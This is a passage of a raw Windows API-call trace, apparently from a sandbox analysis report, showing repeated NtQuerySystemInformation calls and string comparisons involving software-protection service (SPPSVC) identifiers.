ResultLength=0x0) [0239.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f160, Length=0x38, ResultLength=0x0) [0239.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f160, Length=0x38, ResultLength=0x0) [0239.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efe0, Length=0x20, ResultLength=0x0) [0239.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef70, Length=0x20, ResultLength=0x0) [0239.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef70, Length=0x20, ResultLength=0x0) [0239.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eff0, Length=0x28, ResultLength=0x0) [0239.413] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\2de67392-b7a7-462a-b1ca-108dd189f588", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0239.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0239.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0239.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0239.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0239.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0239.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0239.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0239.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0239.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0239.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eff0, Length=0x28, ResultLength=0x0) [0239.426] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\2de67392-b7a7-462a-b1ca-108dd189f588", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0239.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0239.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0239.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0239.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0239.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0239.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0239.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0239.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0239.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0239.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0239.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0239.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0239.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0239.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0239.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0239.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0239.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0239.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.551] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\2de67392-b7a7-462a-b1ca-108dd189f588", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0239.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0239.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0239.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e980, Length=0x20, ResultLength=0x0) [0239.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e900, Length=0x20, ResultLength=0x0) [0239.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e900, Length=0x20, ResultLength=0x0) [0239.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e900, Length=0x20, ResultLength=0x0) [0239.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0239.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0239.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0239.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0239.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0239.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0239.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0239.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0239.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.567] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.567] NtQuerySystemInformation (SystemInformationClass=0xb9, 